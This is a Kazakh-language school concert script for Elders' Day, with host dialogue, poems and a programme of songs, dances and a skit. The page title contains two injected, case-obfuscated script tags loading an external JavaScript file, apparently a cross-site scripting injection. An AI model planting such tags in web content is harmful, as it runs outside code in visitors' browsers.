«ҚАРТТАРЫН ҚАДІРЛЕГЕН ЕЛ АРДАҚТЫ»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

13.10.2019

     «ҚАРТТАРЫН ҚАДІРЛЕГЕН ЕЛ АРДАҚТЫ»

1-қазан Қарттар күніне арналған концерттік бағдарламаның сценарийі

Күні: 01.10.2019ж. Жүргізушілер: Байболат Роза – 10 сынып оқушысы,  Қошенов Темірлан. – 11 сынып оқушысы

Басталуы: Слайдпен «Қымбатты менің қарттарым!»

(Фанфар. Жүргізушілер ортада)

1-жүргізуші: Армысыз ауылымның асылдары,

Жайналсын көңілдердің жасыл бағы.

Сіздер үшін ән мен күй, өлең мен би,

Сіздер үшін мереке шашулары.

2-жүргізуші: Қош келдіңіз ақ жаулықты аналар,

Ақыл кенін арқалаған аталар.

Алдарыңда жауқазындай құлпырған,

Біз алаңсыз балғын шақты балалар.

1-жүргізуші: Қымбатты ақылдың кенін арқалаған айбынды аталар! Ақ жаулықты әжелер, аналар! Барлықтарыңызды қазан айының алғашқы мерекесі қарттар күнімен құттықтаймыз!

2-жүргізуші: Аппақ шашың күн сайын қылаңдаған,

Зейнет емес бейнеттен арылмаған.

Тәңірімдей табынып өтем мәңгі,

Қариялар өзіңді ел сыйлаған.

1-жүргізуші: Ел мүддесін бәрінен биік қоятын, өзінен кейінгі ізіне ерген інілеріне ізеттігін аямайтын, ізінен ерген ұрпағына ұлылығын ұялатып, бір қауымға бас-көз бола білген ауыл қарттарының орны ерекше.

2-жүргізуші: Олай болса, әр халықтың бойында ықылам заманнан бері қалыптасып оны өзгелерден даралап тұратын, тек өзіне ғана тән қасиеттері болады. Біздің халқымыздың сондай ерешеліктерінің бірі – үлкенді сыйлау, оның сөзіне құлақ асу.

1-жүргізуші: Қазақ қарты жасына лайық ауызы дуалы, сөзі берекелі, ісі тыңғылықты, ойы терең, ақылы тілегей теңіз болып келеді. Міне, осындай теңеуге лайық қарияларды жылына бір рет келетін 1-қазан Қарттар күнімен құттықтай отырып «Қарттарын қадірлеген ел ардақты» атты мерекемізге қош келдіңіздер дегім келеді. (пауза).

  Мерекемізді бастамас бұрын сөз кезегін мектеп директорының міндетін  атқарушы Сандалхан Жанерке апайға береміз.

2-жүргізуші: Алдында ақыл берер қария ғой,

Жақсылар жақсылыққа жария ғой.

Жастарға ол парасатты кеңес берер,

Сөзге бай ағып тұрған дария ғой.

Ауылымыздың ардагері ______________________________________ сөз кезегін береміз.

 

 

Ән: «Асыл әжем». Орындайтын:Оралбай Айда

 

1-жүргізуші: Халқымыздың тәлім-тәрбиесі ананың ақ сүтімен, әже өнегесімен, аталар ақылымен берісіп, өзіндік қасиетімізді қалыптастыру көзделген. Ендеше «Мен атам мен әжемнің жалғасымын» бөліміне құлақ түрелік кішкентай бұлдіршіндерге сөз береміз. (бастауыш сынып)

1-жүргізуші: Той деп бүгін шашу шашады

Той деп бүгін әлем сырын ашады

Қарттар күні мейрамына арналған

Бишілер өнерлерін шашады.

Мектебіміздің биші қыздарын сіздердің қошеметтеріңізбен ортамызға шақырайық!      «Қазақ биі». Ай жулдыз тобы

 

2-жүргізуші: Асқар тауым, ақылгөйім, ғұлама,

Аспанымдай мәңгі жаса, құлама

Ер жетсем де еркелігім қалмайды,

Көз алдымда сен тұрғанда ұлы Ана!

Сайлаубай Беколжастың орындауындағы «Ана » әнін қабыл алыңыздар!

 

1-жүргізуші: Ата ардақты тұлға. «Әкеден ұл тусайшы, ата жолын қусайшы» деп халық ұрпаққа атаның мұрасын жалғастыруды уағыздайды. Ата ұрпағының қайырымды, мейірімді, ақылды, іскер болуын тілеп сол үшін қамқорлық іс-әрекеттерін жерге жеткенше дамыта береді, өнеге көрсетеді, өсиет айтады.

10 сынып «-------------------» әні. Орындайтын: Нуртазина Дильназ

1-жүргізуші: Тұра-тұршы есейгенде ұл-қызың,

Жүре тұршы жалғанғанда үзігің.

Маған бақыт неге керек, ақ әже-ау?!

Өзің бірге көре алмасаң қызығын.

  Сіздердің құрметтеріңізге

 Байболат Еркебуланың орындауындағы «     » әнін қабыл алыңыздар!

 

1-жүргізуші: Қарттарды құрметтейтін, олардың алдындағы перзенттік

парызын үлкен ынтамен орындайтын, әдептілік, кішіпейілділік, сергек сезімталдық көрсету сынды қасиеттер қанына сіңіп, жүрегіне ұяламаған ұрпақтан не опа, не қайыр?!

2-жүргізуші: Адамның өмірінің мәні мен сұлулығы, адамның келешегіне сенімділігі – ол баланың ата-анасын ардақ тұтып, өзінің перзенттік қарызын бір сәтке де есінен шығармауында. Қарт кісіні құт-береке деп танысақ – ол ұрпақ көрегендігі.

1-жүргізуші: Ұрпағы құрметтеген ата-ана әр кезде де бақытты.

(11 сынып оқушылары.) Көрініс: «тоқта балам, атаң келер артыңда»

Көрініс: ««Қарттар үйі» атты көріністі тамашалаңыздар! 

 


 

1-жүргізуші: Үлкенді сыйлау, оларға құрмет көрсету – ата-бабадан келе жатырған салтымыз. Сіздердің өмірлік тәжірибелеріңіз бен ақыл-кеңестеріңіз, тәлім-тағылымдарыңыздың біз үшін орны бөлек. Талай жасты тәрбиелеп, ізбасарларыңызды өсірдіңіздер.

2-жүргізуші: Сіздерсіздер бүгінгі ұлықпандар,

Мың жасаған ұрпақпен ұлық жандар.

Қарттар тарих, қазына, ел қазығы,

Ей, адамзат, осыны ұмытпаңдар!

 5 сынып оқушысы Китайбекова Үкіжанің орындауындағы «Қос бәйтерегім: Әкешім-Анашым» әні

 

1-жүргізуші: Абырой амандығың арта берсін,

Бақ дәулет қызығымен қатар берсін.

Ұрпағың жақсы көрген жиі келіп,

Таусылмас дәм-тұзыңды тата берсін.

 

ХОР: «Қариялар азайып бара жатыр» (оқушылар, мұғалімдер бәрі шығып ән айтады)

 

2-жүргізуші: Тыныштық елімізге бере берсін,

Молшылық жерімізге ене берсін.

Соғыстан ел жұртымыз аман болып,

Қызығын бейбіт өмір көре берсін.

1-жүргізуші: Алатаудай кейпі биік қашанда,

Таң сызылып, күлер нұр шашарда

Бата бер деп бар адамдар жаяр қол,

Бір биіктен бір биікке асарда.

Сіздерден бата берулеріңізді сұраймыз! (Бата).

 

1-жүргізуші: Бүгінгі «Қарттарын қадірлеген ел ардақты» атты мерекеміз осымен аяқталды.

2-жүргізуші: Келіп тамашалағандарыңыз үшін көп-көп рақмет!

 

 

 

 

 

     Орындаған: ДТЖО Ж.Жумабаева  тәлімгер  Ә.Отарбай

Просмотров: 1160


Пікір қосу



Деректерді қолтаңбаға қосу